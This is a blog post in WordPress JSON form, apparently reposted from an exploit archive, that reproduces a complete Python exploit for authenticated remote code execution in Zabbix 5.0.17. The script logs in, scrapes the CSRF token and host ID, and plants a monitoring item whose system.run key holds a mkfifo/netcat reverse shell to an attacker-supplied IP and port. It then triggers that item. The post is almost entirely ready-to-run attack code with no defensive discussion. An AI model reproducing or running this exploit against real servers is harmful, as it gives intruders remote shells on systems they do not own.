{"id":21496,"date":"2022-03-10T20:40:01","date_gmt":"2022-03-10T17:40:01","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/166256\/zabbix5017-exec.txt"},"modified":"2022-03-12T08:18:29","modified_gmt":"2022-03-12T04:48:29","slug":"zabbix-5-0-17-remote-code-execution","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/zabbix-5-0-17-remote-code-execution\/","title":{"rendered":"Zabbix 5.0.17 Remote Code Execution"},"content":{"rendered":"

# Exploit Title: Zabbix 5.0.17 – Remote Code Execution (RCE) (Authenticated)
\n# Date: 9\/3\/2022
\n# Exploit Author: Hussien Misbah
\n# Vendor Homepage: https:\/\/www.zabbix.com\/
\n# Software Link: https:\/\/www.zabbix.com\/rn\/rn5.0.17
\n# Version: 5.0.17
\n# Tested on: Linux
\n# Reference: https:\/\/github.com\/HussienMisbah\/tools\/tree\/master\/Zabbix_exploit<\/p>\n

#!\/usr\/bin\/python3
\n# note : this is blind RCE so don’t expect to see results on the site
\n# this exploit is tested against Zabbix 5.0.17 only<\/p>\n

import sys
\nimport requests
\nimport re
\nimport random
\nimport string
\nimport colorama
\nfrom colorama import Fore<\/p>\n

print(Fore.YELLOW+”[*] this exploit is tested against Zabbix 5.0.17 only”)
\nprint(Fore.YELLOW+”[*] can reach the author @ https:\/\/hussienmisbah.github.io\/”)<\/p>\n

def item_name() :
\nletters = string.ascii_letters
\nitem = ”.join(random.choice(letters) for i in range(20))
\nreturn item<\/p>\n

if len(sys.argv) != 6 :
\nprint(Fore.RED +”[!] usage : .\/expoit.py <target url> <username> <password> <attacker ip> <attacker port>”)
\nsys.exit(-1)<\/p>\n

url = sys.argv[1]\nusername =sys.argv[2]\npassword = sys.argv[3]\nhost = sys.argv[4]\nport = sys.argv[5]\n

s = requests.Session()<\/p>\n

headers ={
\n“User-Agent”: “Mozilla\/5.0 (X11; Linux x86_64; rv:78.0) Gecko\/20100101 Firefox\/78.0”,
\n}<\/p>\n

data = {
\n“request”:”hosts.php”,
\n“name” : username ,
\n“password” : password ,
\n“autologin” :”1″ ,
\n“enter”:”Sign+in”
\n}<\/p>\n

proxies = {
\n‘http’: ‘http:\/\/127.0.0.1:8080’
\n}<\/p>\n

r = s.post(url+”\/index.php”,data=data) #proxies=proxies)<\/p>\n

if “Sign out” not in r.text :
\nprint(Fore.RED +”[!] Authentication failed”)
\nsys.exit(-1)
\nif “Zabbix 5.0.17″ not in r.text :
\nprint(Fore.RED +”[!] This is not Zabbix 5.0.17”)
\nsys.exit(-1)<\/p>\n

if “filter_hostids%5B0%5D=” in r.text :
\ntry :
\nx = re.search(‘filter_hostids%5B0%5D=(.*?)”‘, r.text)
\nhostId = x.group(1)
\nexcept :
\nprint(Fore.RED +”[!] Exploit failed to resolve HostID”)
\nprint(Fore.BLUE +”[?] you can find it under \/items then add item”)
\nsys.exit(-1)
\nelse :
\nprint(Fore.RED +”[!] Exploit failed to resolve HostID”)
\nprint(Fore.BLUE +”[?] you can find HostID under \/items then add item”)
\nsys.exit(-1)<\/p>\n

sid= re.search(‘<meta name=”csrf-token” content=”(.*)”\/>’,r.text).group(1) # hidden_csrf_token<\/p>\n

command=f”rm \/tmp\/f;mkfifo \/tmp\/f;cat \/tmp\/f|sh -i 2>&1|nc {host} {port} >\/tmp\/f”<\/p>\n

payload = f”system.run[{command},nowait]”
\nRandom_name = item_name()
\ndata2 ={<\/p>\n

“sid”:sid,”form_refresh”:”1″,”form”:”create”,”hostid”:hostId,”selectedInterfaceId”:”0″,”name”:Random_name,”type”:”0″,”key”:payload,”url”:””,”query_fields[name][1]”:””,”query_fields[value][1]”:””,”timeout”:”3s”,”post_type”:”0″,”posts”:””,”headers[name][1]”:””,”headers[value][1]”:””,”status_codes”:”200″,”follow_redirects”:”1″,”retrieve_mode”:”0″,”http_proxy”:””,”http_username”:””,”http_password”:””,”ssl_cert_file”:””,”ssl_key_file”:””,”ssl_key_password”:””,”interfaceid”:”1″,”params_es”:””,”params_ap”:””,”params_f”:””,”value_type”:”3″,”units”:””,”delay”:”1m”,”delay_flex[0][type]”:”0″,”delay_flex[0][delay]”:””,”delay_flex[0][schedule]”:””,”delay_flex[0][period]”:””,”history_mode”:”1″,”history”:”90d”,”trends_mode”:”1″,”trends”:”365d”,”valuemapid”:”0″,”new_application”:””,”applications[]”:”0″,”inventory_link”:”0″,”description”:””,”status”:”0″,”add”:”Add”
\n}<\/p>\n

r2 =s.post(url+”\/items.php” ,data=data2,headers=headers,cookies={“tab”:”0″} )<\/p>\n

no_pages= r2.text.count(“?page=”)<\/p>\n

#################################################[Searching in all pages for the uploaded item]#################################################
\npage = 1
\nflag=False
\nwhile page <= no_pages :
\nr_page=s.get(url+f”\/items.php?page={page}” ,headers=headers )
\nif Random_name in r_page.text :
\nprint(Fore.GREEN+”[+] the payload has been Uploaded Successfully”)
\nx2 = re.search(rf”(\\d+)[^\\d]>{Random_name}”,r_page.text)
\ntry :
\nitemId=x2.group(1)
\nexcept :
\npass<\/p>\n

print(Fore.GREEN+f”[+] you should find it at {url}\/items.php?form=update&hostid={hostId}&itemid={itemId}”)
\nflag=True
\nbreak<\/p>\n

else :
\npage +=1<\/p>\n

if flag==False :
\nprint(Fore.BLUE +”[?] do you know you can’t upload same key twice ?”)
\nprint(Fore.BLUE +”[?] maybe it is already uploaded so set the listener and wait 1m”)
\nprint(Fore.BLUE +”[*] change the port and try again”)
\nsys.exit(-1)<\/p>\n

#################################################[Executing the item]#################################################<\/p>\n

data2[“form”] =”update”
\ndata2[“selectedInterfaceId”] = “1”
\ndata2[“check_now”]=”Execute+now”
\ndata2.pop(“add”,None)
\ndata2[“itemid”]=itemId,<\/p>\n

print(Fore.GREEN+f”[+] set the listener at {port} please…”)<\/p>\n

r2 =s.post(url+”\/items.php” ,data=data2,headers=headers,cookies={“tab”:”0″}) # ,proxies=proxies )<\/p>\n

print(Fore.BLUE+ “[?] note : it takes up to +1 min so be patient :)”)
\nanswer =input(Fore.BLUE+”[+] got a shell ? [y]es\/[N]o: “)<\/p>\n

if “y” in answer.lower() :
\nprint(Fore.GREEN+”Nice !”)
\nelse :
\nprint(Fore.RED+”[!] if you find out why please contact me “)<\/p>\n

sys.exit(0)<\/p>\n","protected":false},"excerpt":{"rendered":"

# Exploit Title: Zabbix 5.0.17 – Remote Code Execution (RCE) (Authenticated) # Date: 9\/3\/2022 # Exploit Author: Hussien Misbah # Vendor Homepage: https:\/\/www.zabbix.com\/ # Software Link: https:\/\/www.zabbix.com\/rn\/rn5.0.17 # Version: 5.0.17 # Tested on: Linux # Reference: https:\/\/github.com\/HussienMisbah\/tools\/tree\/master\/Zabbix_exploit #!\/usr\/bin\/python3 # note : this is blind RCE so don’t expect to see results on the site # …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-21496","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/21496","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=21496"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/21496\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=21496"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=21496"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=21496"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}